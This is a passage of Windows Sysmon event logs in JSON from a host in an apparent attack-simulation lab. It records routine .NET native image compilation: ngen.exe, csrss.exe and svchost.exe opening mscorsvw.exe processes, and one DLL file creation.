C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:11.762","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-00108BBE1000}","TargetProcessId":"2528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7888,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:11.762\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-00108BBE1000}\r\nTargetProcessId: 2528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:11.762","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-00108BBE1000}","TargetProcessId":"2528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7889,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:11.762\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-00108BBE1000}\r\nTargetProcessId: 2528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:11.762","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-00108BBE1000}","TargetProcessId":"2528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7890,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:13.262\r\nProcessGuid: {A837DB8D-04EB-5F25-0000-001086F41100}\r\nProcessId: 2528\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9e0-0\\System.Web.Mobile.dll\r\nCreationUtcTime: 2020-08-01 06:00:13.262","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:13.262","ProcessGuid":"{A837DB8D-04EB-5F25-0000-001086F41100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9e0-0\\System.Web.Mobile.dll","CreationUtcTime":"2020-08-01 06:00:13.262","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7891,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:13.340\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04ED-5F25-0000-0010A4F91100}\r\nTargetProcessId: 5088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:13.340","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04ED-5F25-0000-0010A4F91100}","TargetProcessId":"5088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7892,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:13.340\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04ED-5F25-0000-0010A4F91100}\r\nTargetProcessId: 5088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:13.340","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04ED-5F25-0000-0010A4F91100}","TargetProcessId":"5088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7893,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:13.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04ED-5F25-0000-0010A4F91100}\r\nTargetProcessId: 5088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:13.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04ED-5F25-0000-0010A4F91100}","TargetProcessId":"5088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7894,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:13.372\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04ED-5F25-0000-0010CAFC1100}\r\nTargetProcessId: 4664\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:13.372","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04ED-5F25-0000-0010CAFC1100}","TargetProcessId":"4664","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7895,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:13.372\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04ED-5F25-0000-0010CAFC1100}\r\nTargetProcessId: 4664\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:13.372","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04ED-5F25-0000-0010CAFC1100}","TargetProcessId":"4664","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7896,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:13.387\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04ED-5F25-0000-0010CAFC1100}\r\nTargetProcessId: 4664\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 